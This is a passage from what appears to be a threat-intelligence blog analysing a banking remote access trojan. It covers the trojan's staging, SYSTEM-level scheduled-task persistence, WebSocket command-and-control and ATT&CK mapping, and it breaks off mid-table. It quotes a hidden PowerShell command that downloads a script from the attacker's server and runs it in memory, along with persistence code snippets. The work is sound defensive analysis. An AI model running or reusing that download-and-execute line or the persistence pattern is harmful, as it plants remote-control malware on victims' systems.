<p class="wp-block-paragraph">The older branch used a pseudo-Microsoft hostname: c.windowns-cdn.com resolving to 149[.]56[.]12[.]51, with the active connection going to 149[.]56[.]12[.]51:443 (owner: powershell.exe PID 5784). This was functional but easier to cluster once defenders noticed the typo in &#8216;windowns&#8217;.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="514" height="166" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/7-Older-branch-C2-DNS-and-connection.png" alt="" class="wp-image-21925" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/7-Older-branch-C2-DNS-and-connection.png 514w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/7-Older-branch-C2-DNS-and-connection-300x97.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/7-Older-branch-C2-DNS-and-connection-370x119.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/7-Older-branch-C2-DNS-and-connection-270x87.png 270w" sizes="auto, (max-width: 514px) 100vw, 514px" /><figcaption class="wp-element-caption">Older branch C2 DNS and connection</figcaption></figure>
</div>


<h2 class="wp-block-heading">The Newer Detonation: Dynamic SvcName and WebSocket Branch</h2>



<h3 class="wp-block-heading">Staging and Payload Delivery</h3>



<p class="wp-block-paragraph">The newer detonation analyzed st.php.malw (SHA256 E9D918FF…66D). The staging pattern still pointed to 198[.]245[.]53[.]26, but the stage file changed from st.txt to st.php:</p>



<ul class="wp-block-list">
<li>GET http://198[.]245[.]53[.]26/st.php</li>



<li>GET http://198[.]245[.]53[.]26/payload.php</li>
</ul>



<p class="wp-block-paragraph">The staging PowerShell now enforced TLS 1.2:</p>



<pre class="wp-block-code"><code>"powershell.exe" -NoP -EP Bypass -W Hidden -c 
 "&#091;Net.ServicePointManager]::SecurityProtocol=&#091;Net.SecurityProtocolType]::Tls12; 
 $env:_xR='1';irm http://198.245.53.26/st.php|iex" </code></pre>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="853" height="234" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/8-Newer-detonation-overview.png" alt="" class="wp-image-21928" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/8-Newer-detonation-overview.png 853w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/8-Newer-detonation-overview-300x82.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/8-Newer-detonation-overview-768x211.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/8-Newer-detonation-overview-370x102.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/8-Newer-detonation-overview-270x74.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/8-Newer-detonation-overview-740x203.png 740w" sizes="auto, (max-width: 853px) 100vw, 853px" /><figcaption class="wp-element-caption">Newer detonation overview</figcaption></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="850" height="75" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/9-Newer-branch-dropped-files.png" alt="" class="wp-image-21930" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/9-Newer-branch-dropped-files.png 850w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/9-Newer-branch-dropped-files-300x26.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/9-Newer-branch-dropped-files-768x68.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/9-Newer-branch-dropped-files-370x33.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/9-Newer-branch-dropped-files-270x24.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/9-Newer-branch-dropped-files-740x65.png 740w" sizes="auto, (max-width: 850px) 100vw, 850px" /><figcaption class="wp-element-caption">Newer branch dropped files</figcaption></figure>



<h3 class="wp-block-heading">Persistence Model</h3>



<p class="wp-block-paragraph">The newer branch uses a cleaner and more flexible persistence model. Instead of fixed ETW-themed names, it builds a Microsoft-looking directory under ProgramData, writes the runtime payload there, then creates a VBS launcher at C:\ProgramData\Microsoft\7c70c4282dfc72fa\c9dba5b0552d.vbs.</p>



<p class="wp-block-paragraph">The runtime payload explicitly sets:</p>



<pre class="wp-block-code"><code>TaskName = SvcName</code></pre>



<p class="wp-block-paragraph">And creates a hidden Scheduled Task running as SYSTEM:</p>



<pre class="wp-block-code"><code>Register-ScheduledTask -TaskName $taskName
New-ScheduledTaskTrigger -AtStartup
New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest -LogonType ServiceAccount</code></pre>



<p class="wp-block-paragraph">In this detonation, the task name was 7c70c4282dfc72fa. If the malware is not elevated yet, it supports a fallback under HKCU\Software\Microsoft\Windows\CurrentVersion\Run &#8211; the sample can survive under the user context first, then migrate into a SYSTEM-level scheduled task later.</p>



<p class="wp-block-paragraph">Registry writes observed:</p>



<ul class="wp-block-list">
<li>HKCU\Software\Microsoft\dc98339fa461 → SvcName = 7c70c4282dfc72fa, FileName = c9dba5b0552d879be654</li>



<li>HKCU\Software\Microsoft\Windows → CU = HKCU:\Software\Microsoft\dc98339fa461</li>



<li>HKCU&#8230;\Internet Settings\ZoneMap → ProxyBypass=1, IntranetName=1, UNCAsIntranet=1, AutoDetect=0</li>
</ul>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="979" height="514" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/10-Decoded-VBS-Launcher.png" alt="" class="wp-image-21932" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/10-Decoded-VBS-Launcher.png 979w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/10-Decoded-VBS-Launcher-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/10-Decoded-VBS-Launcher-768x403.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/10-Decoded-VBS-Launcher-370x194.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/10-Decoded-VBS-Launcher-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/10-Decoded-VBS-Launcher-740x389.png 740w" sizes="auto, (max-width: 979px) 100vw, 979px" /><figcaption class="wp-element-caption">Decoded VBS Launcher</figcaption></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="871" height="552" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/11-Newer-branch-process-tree.png" alt="" class="wp-image-21934" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/11-Newer-branch-process-tree.png 871w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/11-Newer-branch-process-tree-300x190.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/11-Newer-branch-process-tree-768x487.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/11-Newer-branch-process-tree-370x234.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/11-Newer-branch-process-tree-270x171.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/11-Newer-branch-process-tree-740x469.png 740w" sizes="auto, (max-width: 871px) 100vw, 871px" /><figcaption class="wp-element-caption">Newer branch process tree</figcaption></figure>



<h3 class="wp-block-heading">WebSocket C2 and Host-Derived Domains</h3>



<p class="wp-block-paragraph">Instead of the older windowns-cdn pattern, the runtime payload builds a host-specific domain from the victim&#8217;s MachineGuid: MD5(MachineGuid).testewin.com. In this detonation the resolved domain was 52facc3b24f8bad9c5c56819e385f3a1.testewin.com, and the payload connected to:</p>



<pre class="wp-block-code"><code>wss://52facc3b24f8bad9c5c56819e385f3a1.testewin.com:443/agent</code></pre>



<p class="wp-block-paragraph">ANY.RUN showed the domain resolving to Cloudflare addresses 104[.]21.39.21 and 172[.]67[.]142[.]55. The runtime payload also contains a fallback domain (cdn.testewin.com), a fallback IP (149[.]56[.]12[.]51), protocol version 11.07-FAST-RECONNECT, and protocol magic LQWP. That fallback IP links the newer branch directly to the older one.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="677" height="258" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/12-WebSocket-C2-to-agent.png" alt="" class="wp-image-21936" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/12-WebSocket-C2-to-agent.png 677w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/12-WebSocket-C2-to-agent-300x114.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/12-WebSocket-C2-to-agent-370x141.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/12-WebSocket-C2-to-agent-270x103.png 270w" sizes="auto, (max-width: 677px) 100vw, 677px" /><figcaption class="wp-element-caption">WebSocket C2 to /agent</figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="693" height="133" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/13-DNS-resolution.png" alt="" class="wp-image-21938" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/13-DNS-resolution.png 693w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/13-DNS-resolution-300x58.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/13-DNS-resolution-370x71.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/13-DNS-resolution-270x52.png 270w" sizes="auto, (max-width: 693px) 100vw, 693px" /><figcaption class="wp-element-caption">DNS resolution / Cloudflare layer</figcaption></figure>
</div>


<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="420" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/14-Runtime-payload-code-excerpt-1024x420.png" alt="" class="wp-image-21939" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/14-Runtime-payload-code-excerpt-1024x420.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/14-Runtime-payload-code-excerpt-300x123.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/14-Runtime-payload-code-excerpt-768x315.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/14-Runtime-payload-code-excerpt-1536x630.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/14-Runtime-payload-code-excerpt-370x152.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/14-Runtime-payload-code-excerpt-270x111.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/14-Runtime-payload-code-excerpt-740x304.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/14-Runtime-payload-code-excerpt.png 1635w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">c9dba5b0552d879be654.txt Runtime payload code excerpt</figcaption></figure>



<h2 class="wp-block-heading">Threat Intelligence Classification: Chronology and Analytical Assessments</h2>



<p class="wp-block-paragraph">To provide a rigorous analytical framework, this campaign&#8217;s technical elements are broken down into observed telemetry, analytical inferences derived from infrastructure leakage, and historical baselines.</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-338"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="12"
           data-wpID="338"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:25.114854517611%;                    padding:10px;
                    "
                    >
                                        Feature                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:38.43797856049%;                    padding:10px;
                    "
                    >
                                        Older branch (May 25, 2026)                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:36.447166921899%;                    padding:10px;
                    "
                    >
                                        Newer branch (June 09, 2026)                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Initial staging path                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        /st.txt                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        /st.php                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Payload delivery                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        /payload.php                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        /payload.php                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Install path theme                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Fixed ETW-themed paths                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Dynamic ProgramData\Microsoft\<SvcName>                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Main payload filename                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        msedgeupdate.txt / msedge.txt                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        <FileName>.txt (randomized)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Launcher                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        launcher.exe + service components                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        VBS launcher + hidden PowerShell                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Named executable                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        MicrosoftEdgeUpdateCore.exe                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        None stable                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Identity model                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Static artifact names                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Randomized SvcName + FileName                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Primary C2                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        c.windowns-cdn.com → 149.56.12.51                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        *.testewin.com over WebSocket                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Network masking                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Pseudo-Microsoft hostname                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Hashed subdomain + Cloudflare                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Transport                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        HTTPS/TCP                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        wss://<server>:443/agent                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence chain                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Partial (minimal registry export)                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Clearly reconstructable                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-338'>
table#wpdtSimpleTable-338{ table-layout: fixed !important; }
table#wpdtSimpleTable-338 td, table.wpdtSimpleTable338 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h3 class="wp-block-heading">Prior Reporting &amp; Legacy Baseline</h3>



<ul class="wp-block-list">
<li><strong>Infrastructure Origin</strong>: Historical tracking from May 2026 established the initial staging footprint on the IP 198[.]245[.]53[.]26, utilizing primitive HTTP staging paths (/st.txt).</li>



<li><strong>Static Execution Blueprint</strong>: The older branch relied entirely on static, predictable installation targets themed after Windows Event Tracing (ETW) logs (<em>\Microsoft\Diagnosis\ETW</em>) and a single pseudo-Microsoft C2 domain (<em>c.windowns-cdn.com</em>).</li>
</ul>



<h3 class="wp-block-heading">Observed Telemetry (Factual Artifacts)</h3>



<ul class="wp-block-list">
<li><strong>Exposed Staging Infrastructure</strong>: Identification of an open directory on 198[.]245[.]53[.]26 exposing the production backend framework, including <em>servidor_completo_pool.py</em> (a FastAPI payload generation manager) and ofuscador[.]py.</li>



<li><strong>Dynamic Endpoint Execution</strong>: Sandbox execution of the June 2026 branch (st[.]php.malw) confirmed a migration to runtime-generated paths based on the victim&#8217;s environment and a VBScript launcher wrapper.</li>



<li><strong>Encrypted WebSocket Transport</strong>: Network telemetry confirmed C2 migration to secure WebSockets (wss://.testewin.com:443/agent) routing through Cloudflare edges (104[.]21[.]39[.]21 / 172[.]67[.]142[.]55).</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Accelerate investigations and enrich security workflows</span><br>
Detection, threat intelligence, hunting, proactive defense.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktoservice" rel="noopener" target="_blank">
Start here
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Analytical Inferences</h3>



<ul class="wp-block-list">
<li><strong>Malware-as-a-Service (MaaS) Engine</strong>: The recovery of <em>servidor_completo_pool.py</em> and its asynchronous pre-generation functions (<em>code_pool.warmup_all()</em>) strongly infers that the threat actors are running an automated, on-demand variant distribution platform to supply multiple affiliates.</li>



<li><strong>Defeating Bulk Network Clustering</strong>: The automated generation of unique subdomains derived from the victim&#8217;s <em>MachineGuid</em> is a calculated architectural choice. It ensures that defense mechanisms cannot sinkhole or block the core C2 infrastructure via generic domain-level blacklisting without risking collateral disruption of legitimate fronting services.</li>



<li><strong>Evasion Optimization Gaps</strong>: While the operators successfully upgraded their network transport layers (WebSockets/Cloudflare), Cloudflare is primarily utilized here to obscure the backend origin infrastructure and complicate direct IP-based blocking. However, since the campaign relies on a dedicated malicious apex domain (<em>*.testewin.com</em>), defenders can effectively deploy blocks at the domain, SNI, or DNS level without risking collateral disruption to unrelated legitimate services hosted behind Cloudflare.</li>
</ul>



<h2 class="wp-block-heading">Execution Flow Comparison</h2>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="968" height="724" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/15-Execution-Flow.png" alt="" class="wp-image-21944" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/15-Execution-Flow.png 968w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/15-Execution-Flow-300x224.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/15-Execution-Flow-768x574.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/15-Execution-Flow-370x277.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/15-Execution-Flow-270x202.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/15-Execution-Flow-740x553.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/15-Execution-Flow-80x60.png 80w" sizes="auto, (max-width: 968px) 100vw, 968px" /></figure>



<h2 class="wp-block-heading">Capability Assessment</h2>



<p class="wp-block-paragraph">Based on payload content, sandbox behavior, and prior branch context, this branch supports:</p>



<ul class="wp-block-list">
<li>Hidden PowerShell staging and dynamic host-specific installation</li>



<li>Persistence via Scheduled Task (preferred) and Run key fallback</li>



<li>WebSocket C2 with resilient reconnect logic (11.07-FAST-RECONNECT)</li>



<li>Screen and session monitoring</li>



<li>Remote input capability</li>



<li>System and process discovery</li>



<li>File transfer and enumeration</li>



<li>Key input tracking and screen capture / overlay workflows</li>



<li>Runtime C# compilation via csc.exe and cvtres.exe</li>
</ul>



<p class="wp-block-paragraph"><strong>This is not a downloader. It is a fully-featured banking-oriented remote access payload.</strong></p>



<h2 class="wp-block-heading">MITRE ATT&amp;CK Mapping</h2>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-339"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="13"
           data-wpID="339"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-align-center wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:11.515151515152%;                    padding:10px;
                    "
                    >
                                        Tactic                      </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-align-center wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:34.621212121212%;                    padding:10px;
                    "
                    >
                                        Technique                      </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-align-center wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:6.6666666666667%;                    padding:10px;
                    "
                    >
                                        ID                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-align-center wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:47.19696969697%;                    padding:10px;
                    "
                    >
                                        Evidence                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Execution                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Scripting Interpreter: PowerShell                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        T1059.001                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Hidden staging execution chains, dynamic base64 assembly, and memory-only execution                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Execution                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Scripting Interpreter: Visual Basic                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        T1059.005                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Use of a standalone .vbs wrapper to launch the primary payload dropped into ProgramData                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Scheduled Task/Job: Scheduled Task                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
